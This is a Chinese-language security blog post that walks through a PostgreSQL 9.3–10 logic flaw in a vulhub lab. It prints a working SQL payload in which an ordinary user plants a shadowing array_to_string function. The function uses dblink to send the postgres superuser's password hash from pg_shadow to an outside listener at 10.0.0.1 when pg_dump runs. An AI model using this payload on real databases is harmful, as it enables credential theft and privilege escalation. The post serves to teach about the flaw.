标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2020-2688]   作者: Hello大鱼 发表于: [2020-05-29]

本文共 [23] 位读者顶过

PostgreSQL : [出自:jiwo.org]

是一款关系型数据库。

其9.3到10版本中存在一个逻辑错误,导致超级用户在不知情的情况下触发普通用户创建的恶意代码,导致执行一些不可预期的操作。

搭建环境的话就用vulhub漏洞环境靶场。具体就不说了,大家可以参考我之前的文章。

我们先通过普通用户vulhub:vulhub的身份登录postgres: psql --host your-ip --username vulhub

执行如下语句后退出:

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$

    select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 

   SELECT pg_catalog.array_to_string($1,$2);

$$ LANGUAGE SQL VOLATILE;

然后我在10.0.0.1上监听5433端口,等待超级用户触发我们留下的这个“后门”。

(假装自己是超级用户)在靶场机器下,用超级用户的身份执行pg_dump命令:docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub,导出vulhub这个数据库的内容。

执行上述命令的同时,“后门”已被触发,10.0.0.1机器上已收到敏感信息:

评论

暂无
发表评论
 返回顶部 
热度(23)
 关注微信